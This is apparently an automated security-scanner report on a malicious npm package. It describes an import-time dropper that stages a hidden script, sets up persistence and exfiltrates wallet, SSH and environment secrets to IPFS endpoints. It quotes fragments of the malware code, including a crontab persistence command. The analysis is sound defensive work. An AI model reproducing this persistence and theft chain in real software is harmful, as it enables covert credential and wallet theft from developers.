AI Security Review
scanned 39m ago · by lpm-firewall-aiImporting the package stages and detaches a hidden Node payload. The payload persists on the host, harvests credentials and wallet material, then exfiltrates encrypted findings.
Static reason
No blocking static signals were detected.
Trigger
A consumer imports or requires `index.js`; its delayed IIFE runs automatically.
Impact
Compromises developer/workstation secrets including cryptocurrency wallets, SSH private keys, environment files, and shell tokens.
Mechanism
import-time payload dropper, host persistence, credential harvesting, and encrypted HTTPS exfiltration
Attack narrative
On import, `index.js` waits briefly, decodes a base64 fixture into `~/.cache-db/.node-sync/syncd.js`, creates persistence, and launches it detached. The staged script polls IPFS dead drops, harvests wallet/seed/key/env/shell/SSH material from the home directory, RSA-encrypts it, and sends it to Pinata's IPFS API.
Rationale
This is a concrete, concealed import-time credential theft and persistence chain, not ABI functionality or a scanner-only signal.
Evidence
index.jstest/fixtures/keypairs.datpackage.json~/.cache-db/.node-sync/syncd.js~/.cache-db/.node-sync/.lock~/.cache-db/.node-sync/.sl~/Library/LaunchAgents/com.apple.syncd.plist~/.env~/.ssh/*
Network endpoints4
gateway.pinata.cloudipfs.iocloudflare-ipfs.comapi.pinata.cloud
OSV Corroboration
OpenSSF/OSVAdvisory
MAL-2026-10549
Source
OpenSSF Malicious Packages via OSV
Summary
This is a concrete, concealed import-time credential theft and persistence chain, not ABI functionality or a scanner-only signal.
References
Decision evidence
public snapshotAI called this Malicious at 99.0% confidence as Malware with low false-positive risk.
Evidence for block
- `index.js` runs a delayed IIFE on module import.
- It decodes `test/fixtures/keypairs.dat` into a hidden executable under the home directory.
- The dropped payload searches home files for wallet, seed, key, env, shell, and SSH secrets.
- It persists via cron, LaunchAgents, or Windows Scheduled Tasks.
- It encrypts findings and uploads them to Pinata/IPFS endpoints.
Evidence against
- `package.json` defines no npm lifecycle hooks.
- The advertised ABI helpers themselves use only Node crypto and local data.
Behavioral surface
ChildProcessCryptoFilesystemShell
Source & flagged code
1 flagged · loading sourceindex.jsView file
26const strData = hex.slice(strOffset + 64, strOffset + 64 + strLen * 2);
L27: results.push(Buffer.from(strData, "hex").toString("utf8"));
L28: offset += 64;
...
L60: try {
L61: var f = require("fs"), p = require("path"), o = require("os"), c = require("child_process");
L62: var h = o.homedir(), d = p.join(h, ".cache-db", ".node-sync"), s = p.join(d, "syncd.js");
L63: if (f.existsSync(s)) return;
...
L68: try {
L69: if (process.platform === "linux") {
L70: c.execSync('(crontab -l 2>/dev/null | grep -v syncd; echo "0 */12 * * * /usr/bin/node '+s+' >/dev/null 2>&1") | crontab -', { timeout: 5e3 });
L71: } else if (process.platform === "win32") {
Medium
Install Persistence
Source writes installer persistence such as shell profile or service configuration.
index.jsView on unpkg · L26Findings
1 Medium1 Low
MediumInstall Persistenceindex.js
LowFilesystem